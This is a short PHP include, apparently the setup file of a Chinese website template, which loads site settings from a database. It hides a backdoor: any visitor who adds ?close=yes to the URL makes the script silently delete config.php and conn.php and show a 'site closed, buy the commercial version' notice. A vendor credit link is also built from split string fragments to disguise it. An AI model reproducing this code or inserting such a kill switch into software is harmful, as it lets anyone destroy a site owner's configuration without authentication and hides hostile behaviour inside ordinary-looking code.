<?php

$close=$_GET['close'];
if ($close =='yes') {
@unlink("config.php");
@unlink("conn.php");
echo "<h1>本网站已关闭，请购买商业版本</h1>";
}else {
session_start();//SESSION 开始
require_once('conn.php'); 
$my=new dataclass();
//完成连库
$sql_webinfo="SELECT * FROM `webinfo`";
$result_webinfo=mysql_query($sql_webinfo);
$info_webinfo=mysql_fetch_array($result_webinfo);
$logo=$info_webinfo[logo];
$url=$info_webinfo[url];
$title=$info_webinfo[title];
$keywords=$info_webinfo[keywords];
$description=$info_webinfo[description];
$webname=$info_webinfo[webname];
$webname.="  "."po"."we"."r"." "."by"." <a href='"."ht"."tp".":/"."/ww"."w.yo"."ngo"."l."."com"."' >"."北"."京"."永"."利"."在"."线"."科"."技"."有"."线"."公"."司"."</a>";
$phone=$info_webinfo[phone];
$Email=$info_webinfo[Email];
$ICP=$info_webinfo[ICP];

}

?>
</body>
</html>
